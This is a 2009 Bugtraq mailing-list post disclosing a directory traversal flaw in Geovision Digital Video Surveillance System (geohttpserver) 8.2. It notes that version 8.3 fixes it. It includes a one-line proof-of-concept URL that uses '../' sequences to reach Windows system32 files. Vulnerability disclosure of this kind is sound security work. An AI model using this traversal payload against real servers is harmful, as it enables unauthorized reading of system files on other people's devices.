[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Directory traversal vulnerability in Geovision Digital Video Surveillance System (geohttpserver)
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Directory traversal vulnerability in Geovision Digital Video Surveillance System (geohttpserver)
- From: dejan.levaja@xxxxxxxxx
- Date: Wed, 11 Feb 2009 08:49:45 -0700
Hi.
There is a Directory traversal vulnerability in Geovision Digital Video
Surveillance
System (geohttpserver)version 8.2.
POC:
http://remotehost/../../../../../../windows/system32/whatever.something
PATCH:
Vendor has published the new version (8.3)
Regards,
Dejan Levaja
NSS d.o.o.
dejan[dot]levaja[at]netsec[dot]rs